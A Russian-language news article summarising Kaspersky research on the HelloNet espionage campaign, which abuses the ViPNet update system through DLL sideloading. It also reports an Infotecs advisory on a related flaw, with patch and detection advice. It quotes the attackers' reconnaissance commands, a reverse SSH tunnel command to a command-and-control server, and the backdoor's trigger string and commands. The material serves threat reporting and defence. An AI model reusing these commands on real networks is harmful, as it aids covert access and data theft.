Кампания HelloNet использует систему обновления ViPNet для закрепления и загрузки вредоносных модулей

от автора

Специалисты «Лаборатории Касперского» выявили кампанию HelloNet. В ней злоумышленники используют новые вредоносные модули и систему обновления ViPNet. Атака началась не позднее мая 2026 года и продолжалась на момент публикации исследования.

Целями стали крупные российские организации из государственного, энергетического, транспортного, образовательного и логистического секторов. Под удар также попали промышленные предприятия. Это не первый случай атак на компьютеры в сетях ViPNet. В 2025 году специалисты «Лаборатории Касперского» нашли бэкдор, который маскировался под обновления ViPNet.

В одной из заражённых систем исследователи обнаружили файл wtsapi32.dll. Он находился в папке C:\Program Files (x86)\InfoTeCS\VIPNet Update System. Эта папка относится к системе обновления ViPNet. Злоумышленники использовали DLL Sideloading. Файл системы обновления itcsrvup64.exe загружается при запуске Windows и может подхватить вредоносную библиотеку из этой папки. Так атакующие пытались закрепиться в системе.

Файл wtsapi32.dll содержит загрузчик HelloInjector. Он внедряет свой код в процесс svchost.exe и запускает следующую нагрузку. Сначала HelloInjector проверяет имя процесса, в котором работает. Если это не svchost.exe, он просматривает все запущенные процессы. Загрузчик ищет процесс, в имени которого есть svchost, а в командной строке — netsvcs.

После этого HelloInjector внедряет код в найденный процесс. Для этого он использует функции NtWriteVirtualMemory и NtCreateThreadEx. В новом процессе загрузчик снова проверяет имя процесса. Если проверка проходит, он загружает и запускает вредоносный код из своей памяти. Этот код хранится в теле загрузчика в открытом виде.

Основную нагрузку исследователи назвали HelloProxy. Она работает как скрытый прокси-сервер и загрузчик новых модулей с командного сервера. HelloProxy перехватывает функции NtDeviceIoControlFile, closesocket и shutdown. Для этого он использует библиотеку Microsoft Detours.

Обработчики closesocket и shutdown не дают закрыть сокеты, которые вредонос использует для связи с сервером управления. Основной код находится в обработчике NtDeviceIoControlFile. Он перехватывает запросы AFD_RECV (0x12017) и AFD_GET_TDI_HANDLES (0x12037).

Эти запросы используются при работе с сокетами. Их перехват может помешать защитным средствам в пользовательском режиме фильтровать сетевые соединения. «Лаборатория Касперского» сообщила, что её продукты видят такую активность и блокируют попытки заражения.

Обработчик AFD_GET_TDI_HANDLES регистрирует сокеты. Обработчик AFD_RECV разбирает входящий трафик. Каждое сообщение, которое вызывает обработку AFD_RECV, вредонос записывает в файл C:\users\public\tesh4RPC.txt. Формат записи: threadid: pid=\r\n.

После установки перехватчиков HelloProxy начинает слушать порты 5003 и 5060. Он ждёт команды от сервера управления. Для проверки соединения модуль отправляет через сокет два байта 0x0502. Затем он ждёт сообщение со строкой ASDFASFSAFASDF. После этого HelloProxy начинает принимать команды.

Модуль может работать как прокси. В этом режиме он получает строки вида адрес:порт, создаёт новые сокеты и передаёт трафик между ними. Также он может загружать новые модули. HelloProxy получает исполняемый файл от командного сервера, загружает его в память своего процесса и запускает в отдельном потоке.

Исследователи нашли две нагрузки, которые были внедрены в svchost.exe. Вероятно, их запустил HelloInjector. Первая нагрузка получила название HelloExecutor. С её помощью атакующие выполняли команды на заражённой машине. Второй модуль назвали HelloCleaner. Он очищал журналы ViPNet и скрывал следы работы злоумышленников.

HelloExecutor применяли для разведки в сетях заражённых организаций. Атакующие проверяли активных пользователей, настройки сети, учётные записи, группы и папки ViPNet. Они выполняли следующие команды:

textquery useripconfig /allping 8.8.8.8 -n 1net user /donet group /dodir “C:\Program Files (x86)”dir “C:\Program Files (x86)\infotecs”dir “C:\Program Files (x86)\infotecs\ViPNet Administrator”dir “C:\Program Files (x86)\infotecs\ViPNet Client\Export”dir “C:\Program Files (x86)\infotecs\ViPNet Client”dir “С:\ProgramData\Infotecs\ViPNet Administrator\kc\Export”dir "$appdata\Infotecs\ViPNet Administrator\kc\Export\ Dst for network "dir c:\users[username]query userdir C:\Users\Public\music

Отдельно злоумышленники интересовались папкой C:\Users\Public\Music. На заражённых машинах они использовали её для запуска SSH-туннеля к серверу управления 5.39.253[.]206. Для этого они применяли переименованный файл легитимной утилиты PuTTY:

textC:\users\public\music\frontpage.exe -C -N -R 8443:[redacted]:5003 sftp@5.39.253[.]206 -P 3522 -pw [redacted]

На одной из заражённых систем также нашли бэкдор HelloBackdoor, написанный на Rust. Он принимает подключения на порту 443. Для запуска он ждёт строку 47c6235b4d2611184. Это вторая половина MD5-хэша строки hello\n.

После запуска HelloBackdoor поддерживает команды !upload, !down и !stop. Команда !upload загружает файл на заражённую машину. !down выгружает файл с неё. Команда !stop останавливает работу бэкдора.

Для этого HelloBackdoor создаёт и запускает BAT-файл. Файл удаляет указанный объект, останавливает службу iplircontrol, ждёт пять секунд и запускает службу снова. Если команда не совпадает с !upload, !down или !stop, бэкдор передаёт её в cmd.exe.

При изучении одного из образцов wtsapi32.dll специалисты нашли неиспользуемую строку HTTP-запроса с адресом news[.]sina[.]com. Этот адрес относится к китайскому новостному порталу Sina. В строках HelloBackdoor также нашли сведения о загрузке пакетов Rust с зеркала mirrors[.]ustc[.]edu.cn во время сборки.

Эти следы могли остаться в файлах случайно. При этом злоумышленники могли добавить их намеренно, чтобы затруднить установление источника атаки. «Лаборатория Касперского» с низкой степенью уверенности связывает кампанию с неизвестной китайскоязычной APT-группой.

16 июля 2026 года компания «Инфотекс» также сообщила о новом способе целевой атаки на сети ViPNet. Он связан с транспортным протоколом mftp в ПК ViPNet Client 4. Компания выявила проблему на узле с установленным ViPNet Administrator.

Атака возможна, если злоумышленники уже получили доступ к узлу ViPNet Administrator в доверенной сети. С такого узла они могут отправить специально подготовленный конверт через межсетевое взаимодействие. Конверт выглядит как легитимное обновление и содержит вредоносный код.

Новая атака использует ошибку при обработке относительных путей. Ошибка позволяет нарушить целостность среды, повысить привилегии на атакуемом узле и выполнить произвольный код.

«Инфотекс» рекомендовала обновить сертифицированную сборку ViPNet Client 4 до версии 4.5.3, сборка 65211, или новее. Релизную сборку ViPNet Client 4 следует обновить до версии 4.5.5, сборка 24733, или новее. На момент публикации компания планировала выпустить эту версию в ближайшее время. ViPNet Administrator нужно обновить до версии 4.6.11.5113 или новее.

Если сеть связана с другими защищёнными сетями, за которые организация не отвечает, «Инфотекс» советует проверить свои узлы на признаки заражения. Для этого компания предлагает использовать подготовленные YARA-правила и инструкцию по их запуску через утилиту YARA.

При обнаружении признаков заражения или подозрительной активности с узлов ViPNet в сторону координаторов и других систем инфраструктуры компания рекомендует обратиться в техническую поддержку «Инфотекс». Также она советует соблюдать правила работы с продуктами ViPNet, не давать пользователям права администратора, вовремя обновлять антивирусы и поддерживать актуальные версии продуктов ViPNet.

«Лаборатория Касперского» советует уделить больше внимания защите рабочих станций с ViPNet. Компания рекомендует отслеживать трафик на портах 5003 и 5060. Это поможет вовремя заметить признаки заражения.

ссылка на оригинал статьи https://habr.com/ru/articles/1060000/